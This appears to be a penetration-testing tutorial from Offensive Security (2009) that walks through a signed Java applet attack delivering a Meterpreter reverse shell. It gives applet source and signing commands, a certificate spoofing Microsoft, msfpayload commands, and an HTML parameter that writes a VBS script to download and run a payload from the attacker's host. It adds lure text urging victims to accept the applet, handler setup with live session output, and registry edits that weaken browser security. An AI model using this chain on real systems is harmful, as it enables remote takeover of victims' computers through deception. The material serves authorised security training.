Notification:  

Add   Edit   Delete   Sort   Print   Change Password   Settings   Permissions

Java Applet Infection

Joshua Abraham (jabra) published a great article which was based on a talk given at the Infosec World Conference with Rafal Los and can be found at http://blog.spl0it.org. Essentially, what the two were able to do is build a java applet that once executed in a browser will actually allow us to execute a Meterpreter payload if the target accepts the security warning.

Before we dive into this we need to meet some prerequisites on our attackers machine before we begin.

root@bt4:/# apt-get install sun-java6-jdk

Jabra has simplified most of the process with the bash script below to reduce input errors. You can download this script at: http://spl0it.org/files/makeapplet.sh

#!/bin/bash
#
# Shell script to sign a Java Applet
# Joshua "Jabra" Abraham <jabra@spl0it.org>
# Tue Jun 30 02:26:36 EDT 2009
#
# 1. Compile the Applet source code to an executable class.
#
# javac HelloWorld.java
#
# 2. Package the compiled class into a JAR file.
#
# jar cvf HelloWorld.jar HelloWorld.class
#
# 3. Generate key pairs.
#
# keytool genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
#
# 4. Sign the JAR file.
#
# jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass - signedjar SignedHelloWorld.jar
# HelloWorld.jar signapplet
#
# 5. Export the public key certificate.
#
# keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
#
# 6. Deploy the JAR and the class file.
#
# <applet code="HelloWorld.class" archive="SignedHelloWorld.jar" width=1 height=1> </applet>
#
echo "Enter the name of the applet without the extension:"
read NAMEjavac $NAME.javaif [ $? -eq 1 ] ; then
echo "Error with javac"
exit
fi

echo "[+] Packaging the compiled class into a JAR file"
jar cf $NAME.jar $NAME.class
if [ $? -eq 1 ] ; then
echo "Error with jar"
exit
fi

echo "[+] Generating key pairs"
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
if [ $? -eq 1 ] ; then
echo "Error with generating the key pair"
exit
fi

echo "[+] Signing the JAR file"
jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar "Signed$NAME.jar" $NAME.jar signapplet
if [ $? -eq 1 ] ; then
echo "Error with signing the jar"
exit
fi

echo "[+] Exporting the public key certificate"
keytool -export -keystore mykeystore -storepass mystorepass -alias signapplet -file mycertificate.cer
if [ $? -eq 1 ] ; then
echo "Error with exporting the public key"
exit
fi
echo "[+] Done"
sleep 1
echo ""
echo ""
echo "Deploy the JAR and certificate files. They should be deployed to a directory on a Web server."
echo ""
echo "<applet width='1' height='1' code='$NAME.class' archive='Signed$NAME.jar'> "
echo ""

We will now make a working directory for us to store this file and then grab it from his site or copy and paste it into your favorite text editor.

root@bt4:/# mkdir ./java-applet

root@bt4:/# cd ./java-applet

We need to make a java applet which we will then sign. For this, we will copy and paste the text below into your favorite text editor and save it as : "MSFcmd.java". For the remainder of this module, leave your editor open as you will need to modify some parameters as we go along with this module.

import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter("first");
try {
f = Runtime.getRuntime().exec("first");
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}

Next, we will use Jabras shell script to aid us in making our certificate. The following command will download the script, make it executable, and then launch the script to produce the certs.

root@bt4:/java-applet/# wget http://spl0it.org/files/makeapplet.sh && chmod a+x ./makeapplet.sh

root@bt4:/java-applet/# ./makeapplet.sh

Enter the name of the applet without the extension: MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
What is your first and last name? [Unknown]: MSFcmd
What is the name of your organizational unit? [Unknown]: Microsoft
What is the name of your organization? [Unknown]: Microsoft Organization
What is the name of your City or Locality? [Unknown]: Redmond
What is the name of your State or Province? [Unknown]: Washington
What is the two-letter country code for this unit? [Unknown]: US
Is CN=MSFcmd, OU=Microsoft, O=Microsoft Organization, L=Redmond, ST=Washington, C=US correct? [no]: yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file
[+] Done

Now that everything is setup for us, we need to deploy the JAR and the class file.

root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/

root@bt4:/java-applet/# cp MSFcmd.class /var/www/

root@bt4:/java-applet/# apache2ctl start

Now that the applet is deployed, we will have to create a Meterpreter payload. Change 'X.X.X.X' in the examples below to match your Attackers IP address. This command uses msfpayload to create a Reverse TCP Meterpreter Shell with our victim. We generate this payload in Raw format and pipe it into msfencode, saving the payload as an executable. The executable is then copied to our web root directory and made executable.

root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | ./msfencode -t exe -o my.exe

root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www/

root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe

Now we need to add a command into our index.html file which will allow the client to download and execute our payload. Basically, this page will launch a java applet signed by ourselves, which, when given permission by the client, will then call cmd.exe from their system, echoing lines into a vbs script named "apsou.vbs". Be forewarned that this file can be found on the system after all successful and "some" failed attempts. After this file is created, the same command string launches the vbs script and feeds it a variable, the attackers link to the payload "my.exe". Once the payload has been downloaded it will then execute my.exe with that users permissions.

We need to modify our index.html page which our clients will view. In a real world scenario, a pentester might try adding some video, web browser games, or other activities to distract or entertain the victim. Clever trickery such as Social Engineering can greatly benefit this type of attack by directing your targets to a specific URL and telling them to accept the security warning to continue viewing your site or use your "Custom Secure IM applet". You can also have different payloads in different folders waiting for different clients.

Enter the command below as one continuous line and be sure to change 'X.X.X.X' to your attacking IP address.

root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html
We will also add a message prompting the user to accept our malicious applet.

root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html

root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet.
We are sorry for any inconvenience. " >> /var/www/index.html


We now need to setup the Metasploit multi/handler to listen for connection attempts from the clients. We will be listening for a reverse shell from the target on port 443. This port is associated with HTTPS traffic and most organizations firewalls permit this internal traffic leaving their networks. As before, change the 'X.X.X.X' to your attackers IP address.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST X.X.X.X
LHOST => X.X.X.X
msf exploit(handler) > set LPORT 443
LPORT +> 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) >exploit -j
[*] Exploit running as background job.
[*] Started reverse handler
[*] Starting the payload handler...

When a victim browses to our website and accepts the security warning, the Meterpreter payload runs and connects back to our handler.

 msf exploit(handler) >
 [*] Sending stage   (718336 bytes)
 [*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477)
 msf exploit(handler) > sessions -i 1
 [*] Starting interaction with 1...

 meterpreter > ps

 Process list
============

     PID   Name           Path
     ---   ----           ----
     204   jusched.exe    C:\ProgramFiles\Java\jre6\bin\jusched.exe
     288   ctfmon.exe     C:\WINDOWS\system32\ctfmon.exe
     744   smss.exe       \SystemRoot\System32\smss.exe
     912   winlogon.exe     C:\WINDOWS\system32\winlogon.exe
     972   services.exe   C:\WINDOWS\system32\services.exe
     984   lsass.exe      C:\WINDOWS\system32\lsass.exe
     1176  svchost.exe    C:\WINDOWS\system32\svchost.exe
     1256  java.exe       C:\Program Files\Java\jre6\bin\java.exe
     1360    svchost.exe    C:\WINDOWS\System32\svchost.exe
     1640  spoolsv.exe    C:\WINDOWS\system32\spoolsv.exe
     1712  Explorer.EXE   C:\WINDOWS\Explorer.EXE
     1872  jqs.exe        C:\Program Files\Java\jre6\bin\jqs.exe
     2412  my.exe         C:\windows\my.exe
     3052  iexplore.exe     C:\Program Files\Internet Explorer\iexplore.exe

 meterpreter >
 

As a final note if you have troubles gaining access, ensure that the files

'C:\windows\apsou.vbs'
and
'C:\windows\my.exe'

DO NOT exist on your target.

If you attempt to re-exploit this client you will not be able to properly launch the vbs script.

If you are still experiencing problems and you have ensured the files above are not on the system,
please check the following locations in the registry and make changes as needed.

Start > run : regedit

navigate to:
HKLM\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only

change value to: 0

navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

click Decimal
change value to 3

navigate to:
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\

make new dword with the name 1C00
value in hex 10000

navigate to:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags

click Decimal
change value to 3

Now we should close regedit and start or restart IE and the new settings should apply.




© Offensive Security 2009